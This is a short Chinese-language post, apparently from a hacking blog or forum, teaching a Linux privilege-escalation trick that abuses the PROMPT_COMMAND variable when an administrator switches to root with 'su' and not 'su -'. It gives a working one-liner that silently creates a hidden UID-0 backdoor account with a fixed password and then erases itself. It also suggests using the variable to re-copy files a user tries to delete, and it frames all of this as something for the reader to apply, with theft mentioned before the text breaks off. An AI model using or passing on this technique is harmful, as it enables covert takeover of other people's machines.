ps:下面讲的特权技巧只要利用的是用户在切换到root用户时,使用的是su命令,而没有使用su – 命令。如果用户切换到root用户时使用su -命令,或者该用户从不切换到root用户,那么下面讲的提权技巧是无用的。
su 与 su – 命令的区别:
su 是切换到其他用户,但是不切换环境变量(比如说那些你用export命令查看一下,就知道两个命令的区别了)。su – 是完整的切换到一个用户环境,环境变量是新用户的环境变量。
正是利用su 切换到root用户时不切换环境变量,可以修改当前普通用户的环境变量,当用户转到root时,命令就会以root权限运行来添加用户。
要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root
看个BASH的环境变量$PROMPT_COMMAND
这个变量保存了在主提示符$显示之前需要执行的命令.
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
看图:
随后你用su变成root,看看是否多了个用户呢
也可以建立用户删除不了的文件
比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去
具体怎么应用看你自己了
不管是偷也好&